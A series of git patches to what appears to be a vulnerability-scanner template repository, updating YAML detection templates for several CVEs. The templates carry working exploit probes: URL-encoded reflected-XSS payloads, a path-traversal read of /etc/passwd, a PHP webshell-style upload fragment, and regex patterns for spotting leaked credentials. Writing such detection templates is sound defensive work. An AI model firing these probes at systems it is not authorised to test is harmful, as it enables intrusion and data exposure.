cve,cve2021,wordpress,wp-plugin,rce,intrusive requests: - raw: @@ -24,7 +26,7 @@ requests: Content-Disposition: form-data; name="award_img"; filename="cve2021.php" Content-Type: application/x-httpd-php - + -----------------------------cd0dc6bdc00b1cf9-- - | @@ -40,9 +42,4 @@ requests: - type: word part: body words: - - "CVE-2021-24499" - - - type: word - part: header - words: - - "text/plain" + - "71abe5077dae2754c36d731cc1534d4d" From ac93a8acaf18fa157fb1c5f8a736a4e942d9149b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:46:36 +0530 Subject: [PATCH 2338/4083] Update CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index 8d87b74364..ddd8a322ce 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 - tags: cves,cve2021,wordpress,xss + tags: cves,cve2021,wordpress,xss,wp-theme requests: - raw: @@ -17,21 +17,21 @@ requests: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - - action=tie_ajax_search&query[]= + + action=tie_ajax_search&query[]= matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From 684d541115c31a1cf864ce97fcf1446e19a25723 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:51:27 +0530 Subject: [PATCH 2339/4083] Update CVE-2021-24364.yaml --- cves/2021/CVE-2021-24364.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml index 8d02f10378..b4f2434d35 100644 --- a/cves/2021/CVE-2021-24364.yaml +++ b/cves/2021/CVE-2021-24364.yaml @@ -8,25 +8,25 @@ info: reference: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 - tags: cves,cve2021,wordpress,xss + tags: cve,cve2021,wordpress,xss,wp-theme requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275\">%27%2C%27custom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D' matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From 14dd731ba200263ac70aa88eab3785bf88c7a6dc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:51:39 +0530 Subject: [PATCH 2340/4083] Update CVE-2021-24407.yaml --- cves/2021/CVE-2021-24407.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index ddd8a322ce..98f6fd96aa 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -8,7 +8,7 @@ info: reference: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 - tags: cves,cve2021,wordpress,xss,wp-theme + tags: cve,cve2021,wordpress,xss,wp-theme requests: - raw: From 1ba6b92a13a5e09e674f4adacd9462b12b4ea491 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 22:58:05 +0530 Subject: [PATCH 2341/4083] Update CVE-2021-37833.yaml --- cves/2021/CVE-2021-37833.yaml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index da7b18b64c..4b98f8b51a 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml @@ -4,32 +4,33 @@ info: name: Hotel Druid 3.0.2 XSS author: pikpikcu severity: medium - description: reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. + description: Reflected cross-site scripting (XSS) vulnerability exists in multiple pages in version 3.0.2 of the Hotel Druid application that allows for arbitrary execution of JavaScript commands. reference: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 - tags: cves,cve2021,hotel-druid,xss + tags: cve,cve2021,hoteldruid,xss requests: - method: GET path: - - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b">w5px3=1' - - '{{BaseURL}}/storia_soldi.php?piu17">e3esq=1' - - '{{BaseURL}}/tabella.php?jkuh3">yql8b=1' - - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1' + - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1' + - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1' + - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html - type: status status: From 9b31b064938690456cb7f5f91c13104d3a0334bc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:29:49 +0000 Subject: [PATCH 2342/4083] Auto Generated CVE annotations [Thu Sep 16 17:29:49 UTC 2021] :robot: --- cves/2021/CVE-2021-24364.yaml | 5 +++++ cves/2021/CVE-2021-24407.yaml | 5 +++++ 2 files changed, 10 insertions(+) diff --git a/cves/2021/CVE-2021-24364.yaml b/cves/2021/CVE-2021-24364.yaml index b4f2434d35..61d31c4a48 100644 --- a/cves/2021/CVE-2021-24364.yaml +++ b/cves/2021/CVE-2021-24364.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/1d53fbe5-a879-42ca-a9d3-768a80018382 - https://nvd.nist.gov/vuln/detail/CVE-2021-24364 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24364 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-24407.yaml b/cves/2021/CVE-2021-24407.yaml index 98f6fd96aa..6a5f152f5c 100644 --- a/cves/2021/CVE-2021-24407.yaml +++ b/cves/2021/CVE-2021-24407.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/fba9f010-1202-4eea-a6f5-78865c084153 - https://nvd.nist.gov/vuln/detail/CVE-2021-24407 tags: cve,cve2021,wordpress,xss,wp-theme + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24407 + cwe-id: CWE-79 requests: - raw: From 0c18bafa42a419297226381af15e1a7373d7b715 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:31:46 +0000 Subject: [PATCH 2343/4083] Auto Generated CVE annotations [Thu Sep 16 17:31:46 UTC 2021] :robot: --- cves/2021/CVE-2021-37833.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-37833.yaml b/cves/2021/CVE-2021-37833.yaml index 4b98f8b51a..74f7def049 100644 --- a/cves/2021/CVE-2021-37833.yaml +++ b/cves/2021/CVE-2021-37833.yaml @@ -9,6 +9,11 @@ info: - https://github.com/dievus/CVE-2021-37833 - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 tags: cve,cve2021,hoteldruid,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37833 + cwe-id: CWE-79 requests: - method: GET From 631005ebaa31f2fad8463f6bf299c3975f0b390b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 23:03:45 +0530 Subject: [PATCH 2344/4083] Update CVE-2018-12998.yaml --- cves/2018/CVE-2018-12998.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index fdc71f0e37..234ee0dcdd 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml @@ -7,23 +7,21 @@ info: description: reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. reference: - https://github.com/unh3x/just4cve/issues/10 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html - tags: cves,cve2018,zoho,xss + - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 + tags: cve,cve2018,zoho,xss requests: - method: GET path: - - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111" - headers: - Content-Type: application/x-www-form-urlencoded + - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - "" part: body - type: status @@ -31,6 +29,6 @@ requests: - 200 - type: word - words: - - 'Content-Type: text/html' part: header + words: + - text/html From fdc98d1405717662a4a0a4cb027aa9d8b666ef17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 16 Sep 2021 17:39:06 +0000 Subject: [PATCH 2345/4083] Auto Generated CVE annotations [Thu Sep 16 17:39:06 UTC 2021] :robot: --- cves/2018/CVE-2018-12998.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2018/CVE-2018-12998.yaml b/cves/2018/CVE-2018-12998.yaml index 234ee0dcdd..276fbcff83 100644 --- a/cves/2018/CVE-2018-12998.yaml +++ b/cves/2018/CVE-2018-12998.yaml @@ -10,6 +10,11 @@ info: - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 tags: cve,cve2018,zoho,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-12998 + cwe-id: CWE-79 requests: - method: GET From f1915c705c93dd1ac34bf3ab354ed59ef0006199 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 16 Sep 2021 23:14:04 +0530 Subject: [PATCH 2346/4083] Update ecoa-building-automation-lfd.yaml --- ecoa-building-automation-lfd.yaml | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/ecoa-building-automation-lfd.yaml b/ecoa-building-automation-lfd.yaml index ed94547ad5..c72945853f 100644 --- a/ecoa-building-automation-lfd.yaml +++ b/ecoa-building-automation-lfd.yaml @@ -1,10 +1,10 @@ id: ecoa-building-automation-lfd -info: - author: 0x_Akoko +info: name: "ECOA Building Automation System Local File Disclosure" - reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php" + author: 0x_Akoko severity: high - tags: "ecoa,lfi" + reference: "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php" + tags: ecoa,lfi requests: - raw: @@ -12,7 +12,6 @@ requests: POST /viewlog.jsp HTTP/1.1 Host: {{Hostname}} - yr=2021&mh=6&fname=../../../../../../../../etc/passwd matchers: From 66d0660b596f9c6bdf98d53ae5206229d969474c Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 14:54:28 -0500 Subject: [PATCH 2347/4083] Update google-floc-disabled.yaml --- miscellaneous/google-floc-disabled.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/miscellaneous/google-floc-disabled.yaml b/miscellaneous/google-floc-disabled.yaml index 04184c7821..f235bbb96e 100644 --- a/miscellaneous/google-floc-disabled.yaml +++ b/miscellaneous/google-floc-disabled.yaml @@ -3,7 +3,7 @@ id: google-floc-disabled info: name: Google FLoC Disabled author: geeknik - description: The detected website has decided to explicilty exclude itself from Google FLoC tracking. + description: The detected website has decided to explicitly exclude itself from Google FLoC tracking. reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ severity: info tags: google,floc,misc From 685c21803ed7144f1c6149ce678217faf42ef4fd Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 14:59:38 -0500 Subject: [PATCH 2348/4083] Update adobe-component-login.yaml --- exposed-panels/adobe-component-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/adobe-component-login.yaml b/exposed-panels/adobe-component-login.yaml index b00b2c9b7f..3200d81577 100644 --- a/exposed-panels/adobe-component-login.yaml +++ b/exposed-panels/adobe-component-login.yaml @@ -1,7 +1,7 @@ id: adobe-component-login info: - name: Adobe Component Brower Login + name: Adobe Component Browser Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6846 From 42e644b7fd727715863d8fa8ed1864936fe1ec17 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 15:11:24 -0500 Subject: [PATCH 2349/4083] Update bower-json.yaml --- exposures/files/bower-json.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/files/bower-json.yaml b/exposures/files/bower-json.yaml index 67f8c44101..8d59c7f9bb 100644 --- a/exposures/files/bower-json.yaml +++ b/exposures/files/bower-json.yaml @@ -4,7 +4,7 @@ info: name: bower.json file disclosure author: oppsec severity: info - description: Bower is a package manager which stores packages informations in bower.json file + description: Bower is a package manager which stores package information in the bower.json file tags: exposure requests: From 95664dfc18eabe68c638207afb6e1fb1aae5267f Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 15:13:12 -0500 Subject: [PATCH 2350/4083] Update credentials-disclosure.yaml --- exposures/tokens/generic/credentials-disclosure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/tokens/generic/credentials-disclosure.yaml b/exposures/tokens/generic/credentials-disclosure.yaml index 0670daecbc..5f8c66e822 100644 --- a/exposures/tokens/generic/credentials-disclosure.yaml +++ b/exposures/tokens/generic/credentials-disclosure.yaml @@ -244,7 +244,7 @@ requests: - "(?i)rabbitmq[_-]?password(=| =|:| :)" - "(?i)quip[_-]?token(=| =|:| :)" - "(?i)qiita[_-]?token(=| =|:| :)" - - "(?i)pypi[_-]?passowrd(=| =|:| :)" + - "(?i)pypi[_-]?password(=| =|:| :)" - "(?i)pushover[_-]?token(=| =|:| :)" - "(?i)publish[_-]?secret(=| =|:| :)" - "(?i)publish[_-]?key(=| =|:| :)" @@ -254,7 +254,7 @@ requests: - "(?i)prod[_-]?password(=| =|:| :)" - "(?i)prod[_-]?access[_-]?key[_-]?id(=| =|:| :)" - "(?i)private[_-]?signing[_-]?password(=| =|:| :)" - - "(?i)pring[_-]?mail[_-]?username(=| =|:| :)" + - "(?i)print[_-]?mail[_-]?username(=| =|:| :)" - "(?i)preferred[_-]?username(=| =|:| :)" - "(?i)prebuild[_-]?auth(=| =|:| :)" - "(?i)postgresql[_-]?pass(=| =|:| :)" From ff29b75a6a10f4c007cb2e1081c4e37837f3a836 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 15:15:45 -0500 Subject: [PATCH 2351/4083] Update perl-scanner.yaml --- file/perl/perl-scanner.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/file/perl/perl-scanner.yaml b/file/perl/perl-scanner.yaml index 61f5c05d9f..6618d7e4ea 100644 --- a/file/perl/perl-scanner.yaml +++ b/file/perl/perl-scanner.yaml @@ -34,7 +34,7 @@ file: regex: - 'fcntl' - type: regex - # The second argument specifiying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to be bound to an address of their choice. + # The second argument specifying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to be bound to an address of their choice. regex: - 'bind' - type: regex @@ -50,7 +50,7 @@ file: regex: - 'syscall' - type: regex - # The second argument specifiying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to connect to an arbitrary remote address, enabling hijacking of potentially sensitive network data. + # The second argument specifying the packed address to bind to, should not be derived from user input. If the address is derived from user input, it is possible for a malicious user to cause the socket to connect to an arbitrary remote address, enabling hijacking of potentially sensitive network data. regex: - 'connect' - type: regex @@ -58,7 +58,7 @@ file: regex: - 'system' - type: regex - # The filename argument of open should be carefully checked if it is being created with any user-supplied string as a compontent of it. Strings should be checked for occurences of path backtracking/relative path components (../ as an example), or nulls, which may cause the underlying C call to interpret the filename to open differently than expected. It is also important to make sure that the final filename does not end in a "|", as this will cause the path to be executed. + # The filename argument of open should be carefully checked if it is being created with any user-supplied string as a component of it. Strings should be checked for occurrences of path backtracking/relative path components (../ as an example), or nulls, which may cause the underlying C call to interpret the filename to open differently than expected. It is also important to make sure that the final filename does not end in a "|", as this will cause the path to be executed. regex: - 'open' - type: regex From 56590675cf5d00f2647b354160087c07ab071331 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 15:16:26 -0500 Subject: [PATCH 2352/4083] Update squid-analysis-report-generator.yaml --- exposures/logs/squid-analysis-report-generator.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/logs/squid-analysis-report-generator.yaml b/exposures/logs/squid-analysis-report-generator.yaml index 9e5f2e8919..744b409c6d 100644 --- a/exposures/logs/squid-analysis-report-generator.yaml +++ b/exposures/logs/squid-analysis-report-generator.yaml @@ -3,7 +3,7 @@ id: squid-analysis-report-generator info: name: Squid Analysis Report Generator author: geeknik - description: SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with informations about users, IP addresses, top accessed sites, total bandwidth usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports. + description: SARG is an open source tool that allows you to analyse the squid log files and generates beautiful reports in HTML format with information about users, IP addresses, top accessed sites, total bandwidth usage, elapsed time, downloads, access denied websites, daily reports, weekly reports and monthly reports. reference: https://sourceforge.net/projects/sarg/ severity: high tags: sarg,exposure,logs From 151204ad10d35c1a58b55f28374854da661f887b Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 15:16:45 -0500 Subject: [PATCH 2353/4083] Update iis-shortname.yaml --- fuzzing/iis-shortname.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 63669a0060..1bd5ebddbf 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -3,7 +3,7 @@ info: name: iis-shortname author: nodauf severity: info - description: When IIS uses an old .Net Framwork it's possible to enumeration folder with the symbol ~. + description: When IIS uses an old .Net Framework it's possible to enumeration folder with the symbol ~. tags: fuzz reference: From 03a79aa0c35898a144c8b406e24fb5fbed995c9b Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 15:17:15 -0500 Subject: [PATCH 2354/4083] Update jenkins-script.yaml --- vulnerabilities/jenkins/jenkins-script.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/jenkins/jenkins-script.yaml b/vulnerabilities/jenkins/jenkins-script.yaml index 2d2d073fe6..b9355903ef 100644 --- a/vulnerabilities/jenkins/jenkins-script.yaml +++ b/vulnerabilities/jenkins/jenkins-script.yaml @@ -1,7 +1,7 @@ id: jenkins-script info: - name: Jenkins RCE due to accesible script functionality + name: Jenkins RCE due to accessible script functionality author: philippedelteil severity: critical reference: https://hackerone.com/reports/403402 From fd768f4b2c4028d566b688b05089b6e6dc5ef23d Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 15:18:31 -0500 Subject: [PATCH 2355/4083] Update rack-mini-profiler.yaml --- misconfiguration/rack-mini-profiler.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/rack-mini-profiler.yaml b/misconfiguration/rack-mini-profiler.yaml index c3443eead7..998f3b44c5 100644 --- a/misconfiguration/rack-mini-profiler.yaml +++ b/misconfiguration/rack-mini-profiler.yaml @@ -1,7 +1,7 @@ id: rack-mini-profiler info: - name: rack-mini-profiler environmnet information discloure + name: rack-mini-profiler environmnet information disclosure author: vzamanillo severity: high tags: config,debug From bce788d7a271e8addce57e489005fd3271ae7b36 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 16 Sep 2021 15:22:04 -0500 Subject: [PATCH 2356/4083] Update sql-server-reporting.yaml --- technologies/microsoft/sql-server-reporting.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/microsoft/sql-server-reporting.yaml b/technologies/microsoft/sql-server-reporting.yaml index 4b64c61e6f..4e97bee905 100644 --- a/technologies/microsoft/sql-server-reporting.yaml +++ b/technologies/microsoft/sql-server-reporting.yaml @@ -4,7 +4,7 @@ info: name: Detect Microsoft SQL Server Reporting author: puzzlepeaches severity: info - tags: tech,micrsoft + tags: tech,microsoft requests: - method: GET From f0cac598cb879cc564a21b91007496fe09c34930 Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 17 Sep 2021 02:18:04 +0530 Subject: [PATCH 2357/4083] misc update --- exposures/logs/dsm-terminator-error.yaml | 23 ----------------------- exposures/logs/error-processing.yaml | 23 ----------------------- exposures/logs/struts-problem-report.yaml | 4 ++-- 3 files changed, 2 insertions(+), 48 deletions(-) delete mode 100644 exposures/logs/dsm-terminator-error.yaml delete mode 100644 exposures/logs/error-processing.yaml diff --git a/exposures/logs/dsm-terminator-error.yaml b/exposures/logs/dsm-terminator-error.yaml deleted file mode 100644 index 62ba6f94b5..0000000000 --- a/exposures/logs/dsm-terminator-error.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: dsm-terminator-error - -info: - name: DSM Terminator Error - author: dhiyaneshDK - severity: low - reference: https://www.exploit-db.com/ghdb/4251 - tags: exposures,misconfig,sap - -requests: - - method: GET - path: - - '{{BaseURL}}/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.Terminator' - - matchers-condition: and - matchers: - - type: word - words: - - 'DSM Terminator [ ABORT ]' - - - type: status - status: - - 200 diff --git a/exposures/logs/error-processing.yaml b/exposures/logs/error-processing.yaml deleted file mode 100644 index 77b5533fd1..0000000000 --- a/exposures/logs/error-processing.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: error-processing - -info: - name: Error Occurred While Processing Request - author: dhiyaneshDK - severity: low - reference: https://www.exploit-db.com/ghdb/6115 - tags: exposures,misconfig,logs - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Error Occurred While Processing Request' - - - type: status - status: - - 500 diff --git a/exposures/logs/struts-problem-report.yaml b/exposures/logs/struts-problem-report.yaml index 36ef77058f..118bb6c342 100644 --- a/exposures/logs/struts-problem-report.yaml +++ b/exposures/logs/struts-problem-report.yaml @@ -1,11 +1,11 @@ id: struts-problem-report info: - name: Struts Problem Report + name: Apache Struts in Dev Mode author: dhiyaneshDK severity: low reference: https://www.exploit-db.com/ghdb/4278 - tags: exposures,misconfig + tags: exposure,apache,struts,debug requests: - method: GET From 74871a7412b8a62bc80831779602627789c2d30e Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 17 Sep 2021 02:21:49 +0530 Subject: [PATCH 2358/4083] Update springboot-info.yaml --- misconfiguration/springboot/springboot-info.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/springboot/springboot-info.yaml b/misconfiguration/springboot/springboot-info.yaml index c863ce09b9..c9d77a9f5f 100644 --- a/misconfiguration/springboot/springboot-info.yaml +++ b/misconfiguration/springboot/springboot-info.yaml @@ -3,7 +3,7 @@ id: springboot-info info: name: Detect Springboot Information page author: philippedelteil - severity: low + severity: info description: Displays app name and version information among others values tags: springboot From 6eed1c1f296d98fe95344ad06efc5738d80ef4bf Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 17 Sep 2021 05:49:53 +0700 Subject: [PATCH 2359/4083] Update CVE-2021-38647.yaml --- cves/2021/CVE-2021-38647.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml index 6facae24aa..30a8785d89 100644 --- a/cves/2021/CVE-2021-38647.yaml +++ b/cves/2021/CVE-2021-38647.yaml @@ -3,6 +3,7 @@ id: CVE-2021-38647 info: name: OMIGOD - Open Management Infrastructure RCE author: daffainfo + description: Unauthenticated RCE vulnerability in the Open Management Infrastructure by removing authentication header severity: critical tags: cve,cve2021,rce,omi reference: From 3da54aea44024f9f91d5a545c69192861553d709 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 17 Sep 2021 05:56:23 +0700 Subject: [PATCH 2360/4083] Create CVE-2016-1000142.yaml --- cves/2016/CVE-2016-1000142.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2016/CVE-2016-1000142.yaml diff --git a/cves/2016/CVE-2016-1000142.yaml b/cves/2016/CVE-2016-1000142.yaml new file mode 100644 index 0000000000..b8a8b5e263 --- /dev/null +++ b/cves/2016/CVE-2016-1000142.yaml @@ -0,0 +1,31 @@ +id: CVE-2016-1000142 + +info: + name: MW Font Changer <= 4.2.5 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: | + - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142 + tags: cve,cve2016,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - '"><"' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 320c973288f3cfefb04fdd8d1dcdf12d4ac5dfee Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 17 Sep 2021 08:07:18 +0530 Subject: [PATCH 2361/4083] Create php-warning.yaml --- exposures/logs/php-warning.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 